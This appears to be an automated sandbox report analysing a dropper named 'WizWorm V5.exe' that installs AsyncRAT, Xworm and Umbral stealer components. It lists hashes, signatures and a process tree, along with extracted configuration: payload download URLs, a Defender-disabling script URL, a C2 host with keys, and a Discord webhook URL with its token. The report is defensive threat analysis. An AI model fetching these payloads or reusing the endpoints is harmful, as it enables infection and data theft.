Analysis
-
max time kernel
45s -
max time network
153s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
25-07-2024 18:14
Static task
static1
Behavioral task
behavioral1
Sample
WizWorm V5/WizWorm V5.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
WizWorm V5/WizWorm V5.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
WizWorm V5/WizWorm V5.exe
Resource
win10v2004-20240709-en
General
-
Target
WizWorm V5/WizWorm V5.exe
-
Size
21.3MB
-
MD5
c831f8de57e6bc935d531d95999b7364
-
SHA1
a85f7c7946e458cf1ba64a233b3932cc314c9cad
-
SHA256
e1559165017c04cebc3d56bbb9cc7f5b7b18e520f2eec6f77484496e204a92ca
-
SHA512
1429f4700398b62d70dd51233d95b79aebc0e5a04aa31fea7304cee7b3f7723cd4f8d451945b088615f0f3f77777dfc3e4b8615ce51c42c247a9f392fe46749d
-
SSDEEP
393216:uSrV5LLmx9KZlGlDAzkG7N2mZ8GeVnBmdRqBXsXG6kik5l1aGEWvPBqeh3:B5R5zkG7/OGe6dReXN6CuGpv
Malware Config
Extracted
https://github.com/eq44/d/raw/main/wzcstatus.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
asyncrat
WeedRAT
Default
true-baghdad.gl.at.ply.gg:61202
xInKFBCkbzDz
-
delay
3
-
install
true
-
install_file
wzcdetect.exe
-
install_folder
%AppData%
Extracted
umbral
https://discord.com/api/webhooks/1249878996729200650/D6Sae4N0q4Tdhi6fxln2bXNVm1jQNdpHYtnipXyc04dBJs5Jp2LSJWfIMCi0Hs66R2-7
Extracted
xworm
3.1
true-baghdad.gl.at.ply.gg:61202
Z0m98pC7RpsdD0uc
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 17 IoCs
resource yara_rule behavioral2/files/0x000700000001ac39-49.dat family_umbral behavioral2/memory/4812-52-0x0000024A2F010000-0x0000024A2F050000-memory.dmp family_umbral behavioral2/memory/6128-805-0x000001B4B4D90000-0x000001B4B4DD0000-memory.dmp family_umbral behavioral2/memory/1332-844-0x0000020820160000-0x00000208201A0000-memory.dmp family_umbral behavioral2/memory/2124-1096-0x000002295F0C0000-0x000002295F100000-memory.dmp family_umbral behavioral2/memory/5228-1265-0x0000029DEDFD0000-0x0000029DEE010000-memory.dmp family_umbral behavioral2/memory/1220-1504-0x000001FFB9470000-0x000001FFB94B0000-memory.dmp family_umbral behavioral2/memory/3884-1626-0x000001E749D80000-0x000001E749DC0000-memory.dmp family_umbral behavioral2/memory/5988-1694-0x00000202B37E0000-0x00000202B3820000-memory.dmp family_umbral behavioral2/memory/6048-1809-0x000001D80B300000-0x000001D80B340000-memory.dmp family_umbral behavioral2/memory/4956-1859-0x000001BD58E90000-0x000001BD58ED0000-memory.dmp family_umbral behavioral2/memory/5816-1992-0x0000029EBC140000-0x0000029EBC180000-memory.dmp family_umbral behavioral2/memory/1340-2097-0x00000275293F0000-0x0000027529430000-memory.dmp family_umbral behavioral2/memory/5336-2190-0x000001B5C1B60000-0x000001B5C1BA0000-memory.dmp family_umbral behavioral2/memory/3628-2224-0x0000028985EC0000-0x0000028985F00000-memory.dmp family_umbral behavioral2/memory/3316-2304-0x000001C6A1F70000-0x000001C6A1FB0000-memory.dmp family_umbral behavioral2/memory/1232-2350-0x00000162677F0000-0x0000016267830000-memory.dmp family_umbral -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/1568-75-0x0000016C2D950000-0x0000016C2D95E000-memory.dmp family_xworm -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000700000001ac38-47.dat family_asyncrat -
Blocklisted process makes network request 8 IoCs
flow pid Process 10 2812 powershell.exe 11 2812 powershell.exe 13 1568 powershell.exe 15 2028 powershell.exe 16 2028 powershell.exe 18 1116 powershell.exe 21 1116 powershell.exe 29 5092 sihost.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs
Run Powershell and hide display window.
pid Process 4820 powershell.exe 5008 powershell.exe 5648 powershell.exe 6064 powershell.exe 1220 powershell.exe 6088 powershell.exe 1752 powershell.exe 2952 powershell.exe 1888 powershell.exe 4448 powershell.exe 5092 powershell.exe 1656 powershell.exe 824 powershell.exe 4784 powershell.exe 1568 powershell.exe 4168 powershell.exe 3596 powershell.exe 1952 powershell.exe 5272 powershell.exe 1548 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 2952 WizWormV4.exe 4740 WizWormV4.exe 3656 RoboterXRAT V5.exe 2004 WizWormV4.exe 4244 RoboterXRAT V5.exe 2404 RoboterXRAT V5.exe 2268 WeedClient.exe 4812 sihost.exe 2000 WizWormV4.exe 5092 RoboterXRAT V5.exe 960 WeedClient.exe 4876 sihost.exe 2868 RoboterXRAT V5.exe 2684 RoboterXRAT V5.exe 3172 sihost.exe 224 WeedClient.exe 4860 RoboterXRAT V5.exe 3568 WeedClient.exe 2312 sihost.exe 2400 WizWormV4.exe 524 RoboterXRAT V5.exe 5116 RoboterXRAT V5.exe 3836 sihost.exe 1648 WeedClient.exe 4456 RoboterXRAT V5.exe 1036 WeedClient.exe 3660 sihost.exe 1392 WizWormV4.exe 752 RoboterXRAT V5.exe 3876 RoboterXRAT V5.exe 704 WeedClient.exe 1624 sihost.exe 1400 WizWormV4.exe 4904 RoboterXRAT V5.exe 1768 RoboterXRAT V5.exe 4572 WeedClient.exe 64 sihost.exe 1528 RoboterXRAT V5.exe 4448 WeedClient.exe 4896 sihost.exe 1188 RoboterXRAT V5.exe 3568 WeedClient.exe 3596 sihost.exe 2036 WizWormV4.exe 1640 RoboterXRAT V5.exe 3660 RoboterXRAT V5.exe 824 WeedClient.exe 4192 sihost.exe 1860 RoboterXRAT V5.exe 2312 WeedClient.exe 2404 sihost.exe 3872 WizWormV4.exe 2148 RoboterXRAT V5.exe 164 wzcstatus.exe 3020 RoboterXRAT V5.exe 800 WeedClient.exe 1648 sihost.exe 2548 wzcstatus.exe 4788 RoboterXRAT V5.exe 1392 WeedClient.exe 1132 sihost.exe 3732 WizWormV4.exe 4776 wzcnetwork.exe 3616 RoboterXRAT V5.exe -
Loads dropped DLL 2 IoCs
pid Process 1828 RoboterXRAT V5.exe 5932 RoboterXRAT V5.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 raw.githubusercontent.com 21 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeedClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4176 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2100 schtasks.exe 404 schtasks.exe 2124 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1568 powershell.exe 1568 powershell.exe 1568 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2268 WeedClient.exe 2812 powershell.exe 2812 powershell.exe 4168 powershell.exe 4168 powershell.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 960 WeedClient.exe 4168 powershell.exe 2812 powershell.exe 4168 powershell.exe 2812 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 2952 powershell.exe 2952 powershell.exe 1116 powershell.exe 1116 powershell.exe 2952 powershell.exe 1116 powershell.exe 2952 powershell.exe 1116 powershell.exe 208 powershell.exe 208 powershell.exe 208 powershell.exe 208 powershell.exe 4684 wzcsvc.exe 4684 wzcsvc.exe 4820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1568 powershell.exe Token: SeDebugPrivilege 4812 sihost.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeIncreaseQuotaPrivilege 4780 wmic.exe Token: SeSecurityPrivilege 4780 wmic.exe Token: SeTakeOwnershipPrivilege 4780 wmic.exe Token: SeLoadDriverPrivilege 4780 wmic.exe Token: SeSystemProfilePrivilege 4780 wmic.exe Token: SeSystemtimePrivilege 4780 wmic.exe Token: SeProfSingleProcessPrivilege 4780 wmic.exe Token: SeIncBasePriorityPrivilege 4780 wmic.exe Token: SeCreatePagefilePrivilege 4780 wmic.exe Token: SeBackupPrivilege 4780 wmic.exe Token: SeRestorePrivilege 4780 wmic.exe Token: SeShutdownPrivilege 4780 wmic.exe Token: SeDebugPrivilege 4780 wmic.exe Token: SeSystemEnvironmentPrivilege 4780 wmic.exe Token: SeRemoteShutdownPrivilege 4780 wmic.exe Token: SeUndockPrivilege 4780 wmic.exe Token: SeManageVolumePrivilege 4780 wmic.exe Token: 33 4780 wmic.exe Token: 34 4780 wmic.exe Token: 35 4780 wmic.exe Token: 36 4780 wmic.exe Token: SeIncreaseQuotaPrivilege 4780 wmic.exe Token: SeSecurityPrivilege 4780 wmic.exe Token: SeTakeOwnershipPrivilege 4780 wmic.exe Token: SeLoadDriverPrivilege 4780 wmic.exe Token: SeSystemProfilePrivilege 4780 wmic.exe Token: SeSystemtimePrivilege 4780 wmic.exe Token: SeProfSingleProcessPrivilege 4780 wmic.exe Token: SeIncBasePriorityPrivilege 4780 wmic.exe Token: SeCreatePagefilePrivilege 4780 wmic.exe Token: SeBackupPrivilege 4780 wmic.exe Token: SeRestorePrivilege 4780 wmic.exe Token: SeShutdownPrivilege 4780 wmic.exe Token: SeDebugPrivilege 4780 wmic.exe Token: SeSystemEnvironmentPrivilege 4780 wmic.exe Token: SeRemoteShutdownPrivilege 4780 wmic.exe Token: SeUndockPrivilege 4780 wmic.exe Token: SeManageVolumePrivilege 4780 wmic.exe Token: 33 4780 wmic.exe Token: 34 4780 wmic.exe Token: 35 4780 wmic.exe Token: 36 4780 wmic.exe Token: SeDebugPrivilege 2268 WeedClient.exe Token: SeDebugPrivilege 2312 sihost.exe Token: SeIncreaseQuotaPrivilege 2736 wmic.exe Token: SeSecurityPrivilege 2736 wmic.exe Token: SeTakeOwnershipPrivilege 2736 wmic.exe Token: SeLoadDriverPrivilege 2736 wmic.exe Token: SeSystemProfilePrivilege 2736 wmic.exe Token: SeSystemtimePrivilege 2736 wmic.exe Token: SeProfSingleProcessPrivilege 2736 wmic.exe Token: SeIncBasePriorityPrivilege 2736 wmic.exe Token: SeCreatePagefilePrivilege 2736 wmic.exe Token: SeBackupPrivilege 2736 wmic.exe Token: SeRestorePrivilege 2736 wmic.exe Token: SeShutdownPrivilege 2736 wmic.exe Token: SeDebugPrivilege 2736 wmic.exe Token: SeSystemEnvironmentPrivilege 2736 wmic.exe Token: SeRemoteShutdownPrivilege 2736 wmic.exe Token: SeUndockPrivilege 2736 wmic.exe Token: SeManageVolumePrivilege 2736 wmic.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 992 dwm.exe 992 dwm.exe 992 dwm.exe 992 dwm.exe 992 dwm.exe 992 dwm.exe 992 dwm.exe 992 dwm.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4668 Conhost.exe 5732 Conhost.exe 5132 Process not Found 1332 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4560 wrote to memory of 2952 4560 WizWorm V5.exe 74 PID 4560 wrote to memory of 2952 4560 WizWorm V5.exe 74 PID 2952 wrote to memory of 4740 2952 WizWormV4.exe 75 PID 2952 wrote to memory of 4740 2952 WizWormV4.exe 75 PID 2952 wrote to memory of 2464 2952 WizWormV4.exe 76 PID 2952 wrote to memory of 2464 2952 WizWormV4.exe 76 PID 2952 wrote to memory of 3656 2952 WizWormV4.exe 78 PID 2952 wrote to memory of 3656 2952 WizWormV4.exe 78 PID 2464 wrote to memory of 1548 2464 cmd.exe 79 PID 2464 wrote to memory of 1548 2464 cmd.exe 79 PID 1548 wrote to memory of 3712 1548 net.exe 80 PID 1548 wrote to memory of 3712 1548 net.exe 80 PID 4740 wrote to memory of 2004 4740 WizWormV4.exe 81 PID 4740 wrote to memory of 2004 4740 WizWormV4.exe 81 PID 4740 wrote to memory of 4252 4740 WizWormV4.exe 82 PID 4740 wrote to memory of 4252 4740 WizWormV4.exe 82 PID 4740 wrote to memory of 4244 4740 WizWormV4.exe 83 PID 4740 wrote to memory of 4244 4740 WizWormV4.exe 83 PID 4252 wrote to memory of 4288 4252 cmd.exe 85 PID 4252 wrote to memory of 4288 4252 cmd.exe 85 PID 4288 wrote to memory of 2104 4288 net.exe 86 PID 4288 wrote to memory of 2104 4288 net.exe 86 PID 2464 wrote to memory of 1568 2464 cmd.exe 87 PID 2464 wrote to memory of 1568 2464 cmd.exe 87 PID 3656 wrote to memory of 2404 3656 RoboterXRAT V5.exe 88 PID 3656 wrote to memory of 2404 3656 RoboterXRAT V5.exe 88 PID 3656 wrote to memory of 2268 3656 RoboterXRAT V5.exe 89 PID 3656 wrote to memory of 2268 3656 RoboterXRAT V5.exe 89 PID 3656 wrote to memory of 2268 3656 RoboterXRAT V5.exe 89 PID 3656 wrote to memory of 4812 3656 RoboterXRAT V5.exe 90 PID 3656 wrote to memory of 4812 3656 RoboterXRAT V5.exe 90 PID 4252 wrote to memory of 1752 4252 cmd.exe 92 PID 4252 wrote to memory of 1752 4252 cmd.exe 92 PID 2004 wrote to memory of 2000 2004 WizWormV4.exe 93 PID 2004 wrote to memory of 2000 2004 WizWormV4.exe 93 PID 4244 wrote to memory of 5092 4244 RoboterXRAT V5.exe 94 PID 4244 wrote to memory of 5092 4244 RoboterXRAT V5.exe 94 PID 4244 wrote to memory of 960 4244 RoboterXRAT V5.exe 95 PID 4244 wrote to memory of 960 4244 RoboterXRAT V5.exe 95 PID 4244 wrote to memory of 960 4244 RoboterXRAT V5.exe 95 PID 4244 wrote to memory of 4876 4244 RoboterXRAT V5.exe 96 PID 4244 wrote to memory of 4876 4244 RoboterXRAT V5.exe 96 PID 2004 wrote to memory of 4364 2004 WizWormV4.exe 97 PID 2004 wrote to memory of 4364 2004 WizWormV4.exe 97 PID 4812 wrote to memory of 4780 4812 sihost.exe 98 PID 4812 wrote to memory of 4780 4812 sihost.exe 98 PID 2004 wrote to memory of 2868 2004 WizWormV4.exe 231 PID 2004 wrote to memory of 2868 2004 WizWormV4.exe 231 PID 2404 wrote to memory of 2684 2404 RoboterXRAT V5.exe 102 PID 2404 wrote to memory of 2684 2404 RoboterXRAT V5.exe 102 PID 2404 wrote to memory of 224 2404 RoboterXRAT V5.exe 103 PID 2404 wrote to memory of 224 2404 RoboterXRAT V5.exe 103 PID 2404 wrote to memory of 224 2404 RoboterXRAT V5.exe 103 PID 2404 wrote to memory of 3172 2404 RoboterXRAT V5.exe 104 PID 2404 wrote to memory of 3172 2404 RoboterXRAT V5.exe 104 PID 4364 wrote to memory of 2748 4364 cmd.exe 105 PID 4364 wrote to memory of 2748 4364 cmd.exe 105 PID 2748 wrote to memory of 2124 2748 net.exe 145 PID 2748 wrote to memory of 2124 2748 net.exe 145 PID 2868 wrote to memory of 4860 2868 RoboterXRAT V5.exe 221 PID 2868 wrote to memory of 4860 2868 RoboterXRAT V5.exe 221 PID 2868 wrote to memory of 3568 2868 RoboterXRAT V5.exe 168 PID 2868 wrote to memory of 3568 2868 RoboterXRAT V5.exe 168 PID 2868 wrote to memory of 3568 2868 RoboterXRAT V5.exe 168 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:560
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
PID:992
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:640
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:736
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:912
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1012
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:380
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1104
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3188
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1240
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1268
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1284
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1428
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1452
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:3108
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1560
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1628
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1784
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1836
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1844
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1992
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1576
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2116
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2272
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2280
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2292
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2360
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2392
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2788
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:3124
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3252
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3420
-
C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe"C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"6⤵
- Executes dropped EXE
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"7⤵
- Executes dropped EXE
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"8⤵
- Executes dropped EXE
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"9⤵
- Executes dropped EXE
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"10⤵
- Executes dropped EXE
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"11⤵
- Executes dropped EXE
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"12⤵
- Executes dropped EXE
PID:3732 -
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"13⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"14⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"15⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"16⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"17⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"18⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"19⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"20⤵PID:2720
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"21⤵PID:3316
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"22⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"23⤵PID:652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "23⤵PID:5836
-
C:\Windows\system32\net.exenet file24⤵PID:4744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file25⤵PID:1228
-
-
-
